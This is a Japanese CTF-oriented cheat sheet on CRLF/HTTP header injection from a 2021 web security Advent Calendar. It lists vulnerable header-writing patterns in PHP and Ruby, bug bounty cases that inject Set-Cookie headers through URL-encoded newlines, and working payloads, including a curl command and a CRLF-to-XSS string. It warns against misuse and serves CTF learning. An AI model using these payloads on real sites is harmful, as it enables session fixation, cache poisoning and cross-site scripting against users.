この記事はCTFのWebセキュリティ Advent Calendar 2021の9日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

CRLF Injection

• ヘッダーインジェクション
  • Referer偽装
  • 任意Cookie要請（Session Fixation）
  • 任意のリクエスト作成
  • キャッシュポイゾニングの1ピースにもなったりする
• Rails周辺におけるHTTPヘッダインジェクション脆弱性の動向 - YouTube
  • 昔のphpだとheader("Location: $url");みたいに書いてると脆弱
  • rubyだとresponse.set_header('x-id', "1\rSet-Cookie: foo=bar")のように\rを使えばできる
  • %0d%0aStatus:+500+NG%0d%0a%0d%0a%0d%0ascript%3Ealert(1)%3C\script%3Eのようにすると、apacheだと応答のstatusコードが書き換えられて出力され、リダイレクト応答から一般応答になり、htmlコードが入っているのでXSS発現する
• %E5%98%8Aで実現できないか
  • CRLF injection on Twitter or why blacklists fail

事例

• Get /forgotpassword/%0d%0aSet-Cookie: crlf-injection=fauzan HTTP 1.1で任意Cookieセット可能
• #1102780 bypassing dashboard without account + Information disclosure trough websockets
  • これもGET #password_reset/%0d%0aSet-Cookie:%20crlf-injection=mickey。あれか？nginxのinjectionか？
• The beauty of chaining client-side bugs | by Master SEC | May, 2021 | Medium
  • https://redacted.redacted.com/robot.txtasd%0dSet-Cookie:foo%3dbar一緒っぽいですね

payloads

• なぜかよく見かける直下からCRLF
  • curl -s -L -I "http://subdomain.example/%0aSet-Cookie:crlf=injection;domain=example.com" -c cookie-monster
• CRLFからXSSへ
  • %0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e